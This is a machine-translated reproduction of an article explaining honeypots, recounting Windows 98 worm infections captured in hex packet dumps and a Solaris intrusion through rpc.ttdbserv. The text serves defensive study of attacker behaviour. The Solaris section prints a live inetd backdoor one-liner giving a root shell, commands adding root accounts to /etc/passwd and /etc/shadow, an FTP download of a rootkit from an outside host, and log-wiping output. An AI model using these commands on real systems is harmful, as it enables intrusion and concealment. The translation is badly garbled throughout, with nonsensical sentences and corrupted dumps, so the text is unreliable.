(Reproduced) Honeypot technology explanation

Honeypot technology explanation

Created: 2001-03-03 Updated: 2003-11-13

Article attribute: original

Article Source:

http://www.xfocus.org

Article submission:

()

Honeypot technology explanation

http://www.xfocus.org

Email: Morrison@xfocus.org

introduction:

I told me a story when I chatted in two days before my good friend: He met a person on the Internet and told that he was a hacker, and said that there is no entry in China. My friend was shocked, so the level was too high, but at the same time he had doubts. By modifying some of your FreeBSD as Banner, you have opened some service with NC and back up some SUID files, then start a Sniffer and established a local general system account, and tell this friend with this account. Let him rest assured that I can't get ROOT locally. Later, my friend laughed with me. "You know what this friend did, all of his hit record did not do, when a few burst of overflows in Redhat, there is no compile, then tell me "Your system has been placed behind". " I also laughed after listening, but I thought of Honeypot- "honeypot".

Hoenypot definition

A "honeypot" is a system designed to observe how hackers detect and end intrusion systems. It means that data or applications that do not threaten the company's confidentiality and apps have a lot of temptation for hackers. One system, that is, a computer surface on your network seems to be like a normal machine but at the same time through some special configurations, it is like the mousetrap. We don't use it to capture hackers, just want to know how they don't know how they are observed, the longer the hacker stay in "Honeypot", the more the technology they use, and these Information can be used to assess their technical level to understand the attack tool they use. By learning the tools and ideas they use, we can better protect our systems and networks.

A good "Honeypot" means that hackers never know that they are tracked, of course, "Tao high one foot, magic is one feet", without any "Honeypot" can capture all hackers. We mentioned that hackers mean that some people do not access the system without authorization, it is possible to be a 15-year-old child, or a 45-year-old company employee, even though there are a lot of hackers about our tracking. But we don't know his actual age.

Honeypot is not consistent on each operating system, but the final idea is the same, you have to let your invaders don't know that you are observing him (her), it is best to open IRC J on it. If you want to write a case, you can't be ignorant. You have to choose two articles forever. Let's introduce - << Know your Enemy Worms at War >>. Then we will use NC yourself as a simple "Honeypot" and let's take a look at WineD and DTK.

1. Honeypot on Windows

In a month (2000/9 / 20-2000 / 10/20) We confirm that in our network "Honeypot" suffered 524 NetBIOS scans. These scans are probes based on the UDP137 port (NetBIOS naming service), sometimes accompanied by TCP139 port (NetBIOS session service). All of this shows that there are a lot of scan activities for special services, and some things are happening, and we decided to find out what happened. Our network does not advertise or propaganda in the Internet, just put it there. All signs indicate that these scans we accepted are just a random scan. But it also threatens the security of your system, because these scans are primarily targeted for Windows systems, it is possible to target ordinary home users connected through DSL or Cable. We don't discuss the spy or the home page is black. We only discuss general home users as an attacked object. We are curious about this: Who is making such a scan? What is their intention? Why is there a lot of this scan? Collaborative results? Is it a worm? With a lot of problems, we decided to discover the results and put our Windows "Honeypot", we have installed a Windows98 in the default and shared C: disk, although a Windows98 "Honeypot" doesn't have much tempting But you can still get what we want to know by establishing such systems.

There is a large number of Windows98 systems on the Internet, and this quantity is growing rapidly. As a representative system, there is a large amount of security vulnerability. But as a home user does not recognize the risk of connecting to the Internet, most of them focus on the Internet.

This is our first Microsoft "Honeypot", which is also very simple and wants to learn.

At 2000/10/31, the system is installed, shared open, and connects to the Internet, we start waiting, waiting time is so long.

First worm

After at least 24 hours, we received our first visitors. IP is 216.191.92.10 system (Host-010.hsf.on.ca) scans our network searching for Windows system, he discovered our "Honeypot" and start querying it. At first he tried to get the system name and determine if the shared is open. Once he found sharing, start to detect some binary file on our system. His goal is to determine if someworm has been installed on our "Honeypot". If not, it will be installed. Here, this worm is not installed, and this worm is determined as "Win32.bymer Worm". The purpose of this worm is to use the CPU resources of the occupied host to help someone win the distributed.net competition, and Distributed.net is a organization that provides various challenges (such as CRACK RC5-64) awards with distributed computer free resources. If you win the challenge, you will get some bonuses, here, our visitors take us as a "Volunteers" through the installation of worms to participate in this project.

A person (bymer@inec.kiev.ua) produced this replicable worm, which can be installed on a Distributed.NET client on a vulnerability Windows system that is not suspected. Once installed and executed, the worm can use your system CPU resource to help the installed people win bonuses. During the period, the worm also detects a system that may be invaded. Its goal is to get more CPU resources, and the processing speed increases with an increase in the invasive system. Let's take a look at the packet captured through the network (here we use Snort). To make it more convenient to analyze the NetBIOS protocol, you need some protocol analyzers such as Ethereal. This process is tracked by Sniffer as follows, IP is 172.16.1.105 is the address of our "Honeypot". At the beginning, the worm checks DNetc.ini on our system, which is a standard configuration file for the Distributed.NET client. This configuration file tells the primary server who is trusted. Here we find that he copies this file to our "Honeypot" by tracking the remote system (NetBIOS Name Ghunt, Account GhuNT, Domain Hsfoprov).

11 / 01-15: 29: 18.580895 216.191.92.10:2900 -> 172.16.1.105:139

TCP TTL: 112 TOS: 0x0 ID: 50235 DF

***** pa * SEQ: 0x12930c6 ACK: 0x66b7068 win: 0x2185

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00_1 00 ... [. SMB -.......

00 00 00 00 00 00 00 00 00 聽 57 1C ............

00 00 82 D1 0F ff 00 00 00 07 00 91 00 16 00 20 .............

00 DC 1C 00 3a 10 00 00 00 00 00 00 00 ...............

00 00 00 1A 00 5C 57 49 4E 44 4F 57 53 5C 53 59 ..... / Windows / SY

53 54 45 4D 5C 64 6E 65 74 63 2E 69 6E 69 00 STEM / DNETC.INI.

By the following information we can see the exact transmission configuration of the profile Dentc.in, note bymer@inec.kiev.ua, who is accepting the CPU resource, is likely to be the author of the worm.

11 / 01-15: 29: 18.729337 216.191.92.10:2900 -> 172.16.1.105:139

TCP TTL: 112 TOS: 0x0 ID: 50747 DF

***** Pa * SEQ: 0x1293125 ACK: 0x66B70AD WIN: 0X2140

00 00 01 11 FF 53 4D 42 0B 00 00 00 00 01 00 ..... SMB ........

00 00 00 00 00 00 00 00 00 聽 57 1C ............

00 00 00 00 00 00 00 00 00 00 E1 00 E4 ..............

00 01 E1 00 5B 6D 69 73 63 5D 20 0D 0A 70 72 6F .... [Misc] ..pro

6A 65 63 74 2D 70 72 69 6F 72 69 74 79 3D 4F 47 JECT-PRIORITY = OG

52 2C 52 43 35 2C 43 53 43 2C 44 45 53 0D 0A 0D R, RC5, CSC, DES ... 0A 5B 70 61 72 61 6D 65 74 65 72 73 5D 0D 0A 69. [parameters]..

64 3D 62 79 6D 65 72 40 69 6e 65 63 2E 6B 69 65 D=Bymer@inec.kie

76 2E 75 61 0D 0A 0D 0A 5B 72 63 35 5D 0D 0A 66 v.ua .... [rc5] .. f

65 74 63 68 2D 77 6F 72 6B 75 6E 69 74 2D 74 68 ETCH-WORKUNIT-TH

72 65 73 68 6F 6C 64 3D 36 34 0D 0A 72 61 6e 64 Resideold = 64..rand

6F 6D 70 72 65 66 69 78 3D 32 31 37 0D 0A 0D 0A OmpRefix = 217 ....

5B 6F 67 72 5D 0D 0A 66 65 74 63 68 2D 77 6F 72 [OGR] .. Fetch-Wor

6b 75 6e 69 74 2D 74 68 72 65 73 68 6F 6C 64 3D KUnit-threshold =

31 36 0D 0A 0D 0A 5B 74 72 69 67 67 65 72 73 5D 16 .... [Triggers]

0D 0A 72 65 73 74 61 72 74 2D 6F 6E 2D 63 6F 6E ..Restart-on -Con

66 69 67 2D 66 69 6C 65 2D 63 68 61 6e 67 65 3D fig-file-change =

79 65 73 0D 0A Yes ..

The next software to pass is the distributed.net client-DNETC.EXE. An executable, the original version is no virus. In order to confirm that this file is changed, then we take the MD5 signature of the change file in "Honeypot", then we downloaded the client from distributed.net and the same MD5 is used to sign, the result is the same (D0FD1f93913af70178 bff1a1953f5f7d ), Indicating that the client did not have changed, just to obtain your CPU resource competition, but all this has not been appointed.

11 / 01-15: 34: 09.044822 216.191.92.10:2900 -> 172.16.1.105:139

TCP TTL: 112 TOS: 0x0 ID: 33084 DF

***** Pa * SEQ: 0x129341a ACK: 0x66B71C0 WIN: 0X202D

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00_1 00 ... [. SMB -.......

00 00 00 00 00 00 00 00 00 聽 57 1C ............

00 00 04 26 0F ff 00 00 00 07 00 91 00 16 00 20 ... & ...........

00 Fe 1D 00 3a 10 00 00 00 00 00 00 00 ...............

00 00 00 1A 00 5C 57 49 4E 44 4F 57 53 5C 53 59 ..... / Windows / SY

5c 64 45 4D 5C 64 6E 65 74 63 2E 65 78 65 00 STEM / DNETC.EXE.

Next, the real virus program msi216.exe, this is a system that can be copied by self-replicating, which is looking for a vulnerability system and examines itself, which is likely to lead us to accept a large number of scans. 11 / 01-15: 37: 23.083643 216.191.92.10:2900 -> 172.16.1.105:139

TCP TTL: 112 TOS: 0x0 ID: 40765 DF

***** PA * SEQ: 0x12c146a ACK: 0x66C248B WIN: 0x20B2

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... /. SMB -.....

00 00 00 00 00 00 00 00 00 聽 57 1C ............

00 00 02 f3 0f ff 00 00 00 07 00 91 00 16 00 20 .............

00 c0 1e 00 3a 10 00 00 00 00 00 00 00 ...............

00 00 1B 00 5c 57 49 4e 44 4f 57 53 5c 53 59 ..... / Windows / Sy

5c 6D 73 69 32 31 36 2E 65 78 65 00 STEM / MSI216.EXE.

Finally, the worm uploads a new Win.ini file, the reason for this is to be executed when the system is restarted, because it is difficult to execute the program directly on the remote Win98 system, so the worm modification C: /Windows/Win.ini The file is loaded automatically. This new Win.ini is uploaded to our system.

11 / 01-15: 38: 55.352810 216.191.92.10:2900 -> 172.16.1.105:139

TCP TTL: 112 TOS: 0x0 ID: 1342 DF

****** a * SEQ: 0x12c6f55 ACK: 0x66C95FC WIN: 0x1fbf

00 00 0b 68 FF 53 4D 42 1D 00 00 00 00 01 00 ... H.SMB ........

00 00 00 00 00 00 00 00 00 聽 57 1C ............

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ....... a ........

00 00 00 00 00 00 00 00 00 00 00 00 00 .........,. <.- ..

5B 77 69 6E 64 6F 77 73 5D 0D 0A 6C 6F 61 64 3D [Windows] .. loading =

63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65 C: / Windows / Syste

6D 5C 6D 73 69 32 31 36 2E 65 78 65 0D 0A 72 75 m / msi216.exe..ru

6E 3D 0D 0A 4e 75 6C 6C 50 6F 72 74 3D 4E 6F 6e n = .. nullport = Non

65 0D 0A 0D 0A 5B 44 65 73 6B 74 6F 70 5D 0D 0A E .... [Desktop] ..

57 61 6C 6C 70 61 70 65 72 3D 28 4E 6F 6e 65 29 Wallpaper = (NONE)

0D 0A 54 69 6C 65 57 61 6C 6C 70 61 70 65 72 3d ..tileWallpaper =

31 0D 0A 57 61 6C 6C 70 61 70 65 72 53 74 79 6C 1..wallpaPerstyl65 3D 30 0D 0A 0D 0A 5B 69 6E 74 6C 5D 0D 0A 69 E = 0 .... [INTL] .. i

So far, the worm has completed intrusion and our "Honeypot" has been infected. Everything is that we will restart the system worm will take effect. Once it runs, there will happen:

The Distributed.Net client starts and uses the CPU resource in the competition.

The worm begins looking for a loopholes and copying yourself, which is why UDP137 and TCP139 scanning.

The worm adds the following key value in the registry.

HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / Bymer.Scanner HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / RunServices / bymer.scanner

Do you want to wait for the system restart to execute the program is not trustworthy, but you know that the goal is a Windows desktop system, how long have you restarted your Windows?

Second worm

Busy week, the next day our second worm is coming. This time is the first variant, get your CPU resource to participate in the Distributed.net competition. Different, this time all files are combined with an executable file Wininit.exe, the default installation already has a installation in C: /Windows/wininit.exe, the name is to hide yourself, even if someone discovers that this binary will think of it may be a system file instead of a worm. This is a very common strategy in the hacker community. Once executed, this worm will like the first one. Below we can see our "Honeypot" is infected by the second worm, the remote system NetBIOS name is Window, Account Window, Domain Name LVCW.

11 / 02-21: 41: 17.287743 216.234.204.69:2021 -> 172.16.1.105:139

TCP TTL: 113 TOS: 0x0 ID: 38619 DF

***** pa * SEQ: 0x21cc0ac ACK: 0xCE6736B WIN: 0X2185

00 00 5d FF 53 4D 42 2D 00 00 00 00 01 00 ...] SMB -.....

00 00 00 00 00 00 00 00 00 00 聽 4f 1f ............ o.

00 00 07 EE 0F FF 00 00 00 07 00 91 00 16 00 20 .............

00 20 BB 01 3A 10 00 00 00 00 00 00 00 00 00 00 ..:. ...........

00 00 00 00 57 49 4e 44 4f 57 53 5c 53 59 ..... / Windows / Sy

53 54 45 4D 5C 77 69 6e 69 6e 69 74 2e 65 78 65 STEM / WININIT.EXE

00

Once the worm has installed itself, the remote system then modifies the win.ini file to ensure it is executed on reboot Notice how this executable adds to the already modified c:. /Windows/win.ini file, which has an entry from our Previous Worm. Once the worm is installed, the remote system will modify Win.ini to ensure that it can be run after the system is restarted, here we noticed that it has been added to C: /Windows/win.ini, the previous program is still starting Performation.

11 / 02-21: 41: 48.538643 216.234.204.69:2021 -> 172.16.1.105:139

TCP TTL: 113 TOS: 0x0 ID: 21212 DF

****** A * SEQ: 0x22021c9 ACK: 0xCE68EC7 WIN: 0X1FA3

00 00 0b 68 FF 53 4D 42 1D 00 00 00 00 01 00 ... H.SMB ........

00 00 00 00 00 00 00 00 00 00 聽 4f 1f ............ o.

00 00 84 F4 0C 0F 00 7F 19 00 00 00 00 00 00 ................

00 00 00 00 00 00 00 00 00 00 00 00 00 .........,. <.- ..

5B 77 69 6E 64 6F 77 73 5D 0D 0A 6C 6F 61 64 3D [Windows] .. loading =

63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65 C: / Windows / Syste

6D 5C 77 69 6e 69 6e 69 74 2E 65 78 65 20 63 3A m / wininit.exe C:

5C 77 69 6e 64 6F 77 73 5C 73 79 73 74 65 6D 5C / Windows / System /

6D 73 69 32 31 36 2E 65 78 65 0D 0A 72 75 6e 3D msi216.exe..run =

0D 0A 4E 75 6C 6C 50 6F 72 74 3D 4E 6F 6E 65 0D ..Nullport = None.

0A 0D 0A 5B 44 65 73 6B 74 6F 70 5D 0D 0A 57 61 ... [Desktop] .. WA

After restart, like the last one, the second worm will start with the same process. I feel that the other party seems to be like a somewhat hacker. The owner of the system does not know that the worm has been running on the system, and there is no consciousness that the system is being used to explore other hosts, and their system is connecting to the Internet, making your own business. Each host through dial-up Internet is facing the same attack. Here is initiating a war about the automatic worm detection and threats, just like our "Honeypot".

Since then

After a day, the same worms detected our "Honeypot", first of all, they decided whether to sharing was opened, then it found that the same worm has been installed, then it will leave us. This day, another system detects whether msi216.exe has been installed.

11 / 03-04: 42: 11.596636 210.111.145.180:2341 -> 172.16.1.105:139tcp TTL: 115 TOS: 0x0 ID: 12574 DF

***** Pa * SEQ: 0x2345c04 ACK: 0xE65CC94 WIN: 0X2171

00 00 5d FF 53 4D 42 2D 00 00 00 00 01 00 ...] SMB -.....

00 00 00 00 00 00 00 00 00 1 1d ................

00 00 81 3e 0f ff 00 00 07 00 91 00 16 00 20 ...> ...........

00 3A 26 02 3A 10 00 00 00 00 00 00 00 00 00 00:. &:. ...........

00 00 00 00 57 49 4e 44 4f 57 53 5c 53 59 ..... / Windows / Sy

53 54 45 4D 5C 77 69 6e 69 6e 69 74 2e 65 78 65 STEM / WININIT.EXE

00.

Remote system: NetBIOS name Matthew, account MPYLE, domain name MPYLE

11 / 03-16: 39: 38.723572 216.23.6.24:3946 -> 172.16.1.105:139

TCP TTL: 113 TOS: 0x0 ID: 3309 DF

***** Pa * SEQ: 0x1a7105f ACK: 0x10F8C0F2 Win: 0x2159

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00_1 00 ... [. SMB -.......

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00-

00 00 81 D9 0F ff 00 00 00 07 00 91 00 16 00 20 ...............

00 14 CE 02 3A 10 00 00 00 00 00 00 00 00 ...............

00 00 00 1A 00 5C 57 49 4E 44 4F 57 53 5C 53 59 ..... / Windows / SY

53 54 45 4D 5C 64 6E 65 74 63 2E 69 6E 69 00 STEM / DNETC.INI.

In the next day, November 4th, from IP 207.224.254.206 (Netbios Name SoccerDog, Accountt, Domain Rons) to determine whether DNETC.INI has been installed, when it is seen After installation, he then left. Within three days, our "Honeypot" received a total of 5 probes. At that time, our "Honeypot" starts to try to connect to bymer.boom.ru via HTTP.

This may be that worms are updated in attempts to connect the main server.

Bymer.boom.ru system is a main controller of this worm like a certain time. However, domain name bymer.boom.ru is now parsed into an IP address 192.168.0.1 in RFC 1918. These phenomena seem to show that administrators in this domain stop this worm, we are not sure is that a worm is running sometimes not need to be restarted. One disadvantage with Windows is that there is too little information, there is no log. Below we see "Honeypot" initialization connection bymer.boom.ru, which is likely to be its primary server. 11 / 04-23: 56: 38.855453 172.16.1.105:1027 -> 192.168.0.1:80

TCP TTL: 127 TOS: 0x0 ID: 65300 DF

** s ***** SEQ: 0x17af8d9a Ack: 0x0 Win: 0x2000

TCP Options => MSS: 1460 NOP NOP Sackok

The DNETC.EXE client is connected to the Distributed.Net server and starting data transfer, which should be the credit of the distributed.net instead of a worm's replication process. The final desire to complete the worm, consume CPU resources and upload the result to distributed.net.

11 / 04-23: 56: 40.286898 172.16.1.105:1029 -> 204.152.186.139:2064

TCP TTL: 127 TOS: 0x0 ID: 1301 DF

***** Pa * SEQ: 0x17af8f47 ACK: 0xBE445ED3 WIN: 0X2238

AE 23 E2 77 F6 42 91 51 3e 61 3F EE 86 7F EE 8B. #. W.b.q> a? .....

CE 9E 9D 28 16 BD 4B C5 5E DB FA 62 A6 FA A8 ff ... (.. k. ^ .. B ....

EF 19 57 9C 37 38 06 39 7F 56 B4 D6 C7 75 63 73 ..W.78.9.V ... UCS

0F 94 12 10 57 B2 C0 AD 9F D1 6F 4A E7 F0 1D E7 .... W ..... OJ ....

30 0E CC 84 78 2D 7B 21 C0 4C 29 BE 08 6A D8 5B 0 ... x - {!. l) .. j.

50 89 86 F8 98 A8 35 95 E0 C6 E4 32 28 E5 92 CF P ..... 5 ... 2 (...

71 04 41 6C B9 22 F0 09 01 41 9e A6 49 60 4D 43 Q.al. "... A..I`mc

91 7e FB E0 D9 9D AA 7D 21 BC 59 1A 69 DB 07 B7. ~ .....} !. Y.I ...

B1 F9 B6 54 FA 18 64 F1 42 37 13 8e 8A 55 C2 2B ... t..d.b7 ... u.

CF 32 45 19 1A 93 1F 65 62 B1 CE 02 AA D0 7C 9e .2e .... EB .....

C5 46 78 29 F0 13 97 04 .fx) ....

Once upload, this starts searching for a vulnerability system on the Internet and starts copying themselves. It randomly picks the IP address, then starts to sweep the other party's 135 and 139 ports. Subsequently marked the system with a vulnerability and start copying. If a "Honeypot" environment is designed to block a variety of malicious traffic issued by "Honeypot" that has been infringed, then these scans will never be the Internet. "Honeypot" is like "Roach Motel" here, let the bad guys go in, but not let it. Here you can see that this worm tries to find other vulnerabilities. 11 / 04-23: 58: 05.946299 172.16.1.105:137 -> 39.202.248.187:137

UDP TTL: 127 TOS: 0x0 ID: 30485

Len: 58

0e 94 00 10 00 01 00 00 00 00 00 20 43 4B 41 ............ CKA

41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAAAA

41 41 41 41 41 41 41 41 41 41 41 41 41 00 00 21 AAAAAAAAAAAAa ..!

00 01

Another thing is that I found interesting thing is to re-modify this profile at C: /Windows/win.ini, I really want to be Winint.exe, this worm removes MSI216.exe from the boot configuration. The same DENTC.INI is also modified, and the email address is changed from bymer@inec.kiev.ua to bymer@ukrpost.net, which indicates that the second worm is attempted to remove the first configuration from the configuration to replace it. This phenomenon is like the ecological struggle of nature, and a bug is another compete for the site, or the CPU resource.

We describe our four days of history, and our Windows98 system is invaded by several worms. These worms automatically detect a vulnerability system once they find themselves, and now they are now searching for NetBIOS vulnerabilities. Of course, all NetBios-based scans are all like this. Not all worms are distributed.net. Think about this worm being modified to snoke the secret information on your system, it will easily search for confidential information such as financial information ... Once you find that this information will be sent to anonymous mail account, IRC Channel, or invaded web server .

Thank you H Carvey and Ryan Russell, they are the main technical contributors, see additional information, you can

http://distributed.net or

Http://www.cert.org.

2. Honeypot instance on UNIX

This article is from the << Know your Enemy >> series, as in the previous part, not explaining how to implement "Honeypot" on a UNIX, but mainly to understand the tools used by hackers and them Strategy. Three parts, first, the information provided by the second part rarely released why they and how to attack the system through the dialogue and behavior of the "Honeypot" on the "Honeypot" they think it is considered to be considered. When hackers think this Solaris 2.6 has been broken, they placed IRC in the system. We monitor all the calls in IRC, and our fourteenth day observations are recorded here, I hope everyone can be revealed.

The system suffers from invading

Our "Honeypot" uses a default to install the Solaris 2.6 system, and we have not made any modifications or installation patches. We set such a system that we want to attract hackers to enter our system, through their activities, we can study their thinking. On June 4, 2000, our system was invaded by hackers. They passed the rpc.ttdbserv vulnerability, which allowed remote in the Tooltalk object database (CVE-1999-0003, BugTraq ID 122), which is in Sans are listed as the top 10, our IDS, Snort's detection information is as follows:

Jun 4 11:37:58 Lisa Snort [5894]: IDS241 / RPC.TTDBSERV-SOLARIS-KILL: 192.168.78.12:877 -> 172.16.1.107:32775

RPC.TTDBSERV Vulnerability is a buffer attack, which allows remote users to perform commands as root on the system. The following command is executed and a latter program is installed. Ingreslock service (port 1524) is added to a file called / tmp / bob, then running inetd as a configuration file, after executing, it gave a root shell on port 1524, allowing remote users to do system access.

/ bin / ksh -c echo 'ingreslock stream tcp no' >> / tmp / bob; / usr / sbin / inetd -s / tmp / bob

Once the hacker is installed in the back door, he connects to the port 1524 to get the root shell, and execute as a command. In our system, two accounts have been added, so that he can play in Telnet. Note the following errors and control characters because the shell binding at the 1524 port does not have a good environment.

# CP / etc / passwd /etc/.tp;

^ Mcp / etc / shadow /etc/.ts;

Echo "R: x: 0: 0: User: /: / sbin / sh" >> / etc / passwd;

Echo "RE: X: 500: 1000: daem: /: / sbin / sh" >> / etc / passwd;

Echo "R :: 10891 :::::: 10891 ::::::" >> / etc / shadow;

Echo "Re: 6445 :::::: 6445 :::::::645 :::::

: Not found

# ^ M: Not Found

# ^ M: Not Found

# ^ M: Not Found

# ^ M: Not Found

# ^ M: Not Found

# WHO;

Rsmith Console May 24 21:09

^ M: Not found

# exit;

When the hacker has two account "re" and "r" on our system, he can come on "RE" telnet, and SU is "R", this account is 0, we will revisit him Knock button record.

! "'!" P # $ # $' linux '

Sunos 5.6

Login: RE

Choose a new password.

New Password: Abcdef

Re-enter new password:

ABCDEF

Telnet (System): Passwd

SuccessFully Changed for Re

Sun Microsystems Inc.Sunos 5.6 Generic August 1997

$ su r

Our guests are now getting root privileges. The next step is to install the tool and control the entire system. First, we see that he creates a hidden catalog to hide his tools.

# MKDIR / dev / ".."

# CD / dev / ".."

After building this directory, he began to download the tools you need from other systems.

# ftp shell.example.net

Connected to shell.example.net.

220 shell.example.net

FTP Server (Version 6.00) Ready.

Name (shell.example.net: Re):

J4N3

331 Password Required for J4N3.

Password: abcdef

230 USER J4N3 Logged in.

FTP> get sun2.tar

200 Port Command Successful.

150 Opening Ascii Mode

Data connection for 'sun2.tar' (1720320 Bytes).

226 Transfer Complete.

Local: Sun2.tar Remote: sun2.tar

1727580 BYtes Received in 2.4e 02 seconds (6.90 kbytes / s)

FTP> Get L0GIN

200 Port Command Successful.

150 Opening Ascii Mode

Data Connection for 'l0gin' (47165 bytes).

226 Transfer Complete.

Local: L0GIN Remote: l0gin

47378 Bytes Received in 7.7 Seconds (6.04 kbytes / s)

FTP> quit

U221 Goodbye.

Once this tool is successfully downloaded, the next is unpacking and installation. Here is to pay attention to his entire installation process through a simple script setup.sh, this script calls another script secure.sh.

# tar -xvf sun2.tar

X sun2, 0 bytes, 0 Tape Blocks

X Sun2 / ME, 859600 BYtes, 1679 Tape Blocks

X Sun2 / Ls, 41708 Bytes, 82 Tape Blocks

X Sun2 / NetStat, 6784 Bytes, 14 Tape Blocks

X Sun2 / TCPD, 19248 BYtes, 38 Tape Blocks

X Sun2 / Setup.sh, 1962 Bytes, 4 Tape Blocks

X Sun2 / PS, 35708 BYtes, 70 Tape Blocks

x sun2 / packet, 0 bytes, 0 Tape Blocks

X Sun2 / Packet / Sunst, 9760 Bytes, 20 Tape Blocks

X Sun2 / Packet / BC, 9782 Bytes, 20 Tape Blocks

X Sun2 / Packet / SM, 32664 BYtes, 64 Tape Blocks

X Sun2 / Packet / Newbc.txt, 762 Bytes, 2 Tape Blocks

X Sun2 / Packet / Syn, 10488 BYtes, 21 Tape Blocks

X Sun2 / Packet / S1, 12708 Bytes, 25 Tape Blocks

X Sun2 / Packet / SLS, 19996 Bytes, 40 Tape Blocks

X Sun2 / Packet / Smaq, 10208 Bytes, 20 Tape Blocks

X Sun2 / Packet / UDP.s, 10720 Bytes, 21 Tape Blocks

X Sun2 / Packet / Bfile, 2875 bytes, 6 Tape Blocks

X Sun2 / Packet / Bfile2, 3036 Bytes, 6 Tape Blocks

X Sun2 / Packet / Bfile3, 20118 Bytes, 40 Tape Blocks

X sun2 / packet / sunsmurf, 11520 bytes, 23 Tape Blocks

X sun2 / sys222, 34572 bytes, 68 Tape Blocks

X Sun2 / M, 9288 Bytes, 19 Tape Blocks

X sun2 / l0gin, 47165 bytes, 93 Tape Blocks

X Sun2 / Sec, 1139 Bytes, 3 Tape Blocks

X sun2 / pico, 222608 bytes, 435 Tape Blocks

X Sun2 / SL4, 28008 BYTES, 55 TAPE BLOCKS

X Sun2 / Fix, 10360 Bytes, 21 Tape Blocks

x sun2 / bot2, 508 bytes, 1 Tape Blocks

X sun2 / sys222.conf, 42 bytes, 1 tape blocks

x sun2 / le, 21184 bytes, 42 Tape Blocks

X Sun2 / Find, 6792 Bytes, 14 Tape Blocks

X Sun2 / BD2, 9608 Bytes, 19 Tape Blocks

X Sun2 / Snif, 16412 Bytes, 33 Tape Blocks

X Sun2 / Secure.sh, 1555 bytes, 4 Tape Blocks

X Sun2 / Log, 47165 Bytes, 93 Tape Blocks

X sun2 / check, 46444 bytes, 91 Tape Blocks

X Sun2 / Zap3, 13496 Bytes, 27 Tape Blocks

X Sun2 / IDRun, 188 Bytes, 1 Tape Blocks

X Sun2 / IDSol, 15180 Bytes, 30 Tape Blocks

X Sun2 / Sniff-10MB, 16488 Bytes, 33 Tape Blocks

X Sun2 / Sniff-100MB, 16496 Bytes, 33 Tape Blocks

# rm sun2.tar

# mv l0gin sun2

#CD sun2

#. / setup.sh

HAX0R W1TH K1DD13

Ok this thing is intrumpte :-)

Here this toolkit first clears information related to his behavior.

- WTMP:

/ VAR / ADM / WTMP IS Sun Jun 4 11:47:39 2000

/ usr / adm / wtmp is sun jun 4 11:47:39 2000

/ etc / wtmp is sun jun 4 11:47:39 2000

/ var / log / wtmp cannot Open

WTMP = / var / adm / wtmp

Removing User Re At Pos: 1440

DONE!

- UTMP:

/ var / adm / utmp is sun jun 4 11:47:39 2000

/ usr / adm / utmp is sun jun 4 11:47:39 2000

/ etc / utmp is sun jun 4 11:47:39 2000

/ var / log / utmp cannot Open

/ var / run / utmp cannot Open

UTMP = / var / adm / utmpremoving user re atts: 288

DONE!

- Lastlog:

/ var / adm / lastlog is sun jun 4 11:47:39 2000

/ USR / ADM / LastLog Is Sun Jun 4 11:47:39 2000

/ etc / lastlog cannot Open

/ var / log / lastlog cannot Open

LastLog = / var / adm / lastlog

User Re Has No wtmp Record. Zeroing LastLog ..

- WTMPX:

/ VAR / ADM / WTMPX IS Sun Jun 4 11:47:39 2000

/ USR / ADM / WTMPX IS Sun Jun 4 11:47:39 2000

/ etc / wtmpx is sun jun 4 11:47:39 2000

/ var / log / wtmpx cannot Open

WTMPX = / VAR / ADM / WTMPX

DONE!

- UTMPX:

/ var / adm / utspx is sun jun 4 11:47:39 2000

/ usr / adm / utmpx is sun jun 4 11:47:39 2000

/ ETC / UTMPX IS Sun Jun 4 11:47:39 2000

/ var / log / utmpx cannot Open

/ var / run / utmpx cannot Open

UTMPX = / var / adm / utmpx

DONE!

./setup.sh: ./zap: NOT FOUND

After cleaning the log file, they start to reinforce the system security for system security. Because they can easily enter the system, others are equally possible, they don't want their "labor results" to be grabbed by others.

./secure.sh: rpc.ttdb =: not Found

#: securing.

CHANGING MODES ON LOCAL FILES.

#: Will Add More Local Security Later.

#: 2) Remote Crap Like Rpc.status, NLOCKMGR ETC ..

./secure.sh: usage: kill [[-sig] id ... | -l]

./secure.sh: usage: kill [[-sig] id ... | -l]

#: 3) Killed Statd, Rpcbind, NLOCKMGR

#: 4) Removing Them So They Ever Start Again!

5) secured.

207? 0:00 inetd

11467? 0:00 inetd

Cp: ​​cannot access /dev/../sun/bot2

Kill these Processes @! #! @ #!

CP: Cannot Access LPQ

./setup.sh: / dev / ttyt / idrun: Cannot Execute

The next step IRC Proxy started running, but then he killed the improvement again and was confused.

Irc Proxy V2.6.4 Gnu Project (c) 1998-99

Coded by James Ster

: bugs-> (Pharos@refract.com) or Irc Pharos on Efnet

--Using conf file ./sys222.conf

--Configuration:

Daemon Port ......: 9879

MaxUsers ...........

Default conn port: 6667

Pid file .........: ./ pid.sys222vhost default ....: - System default-

Process id .......: 11599

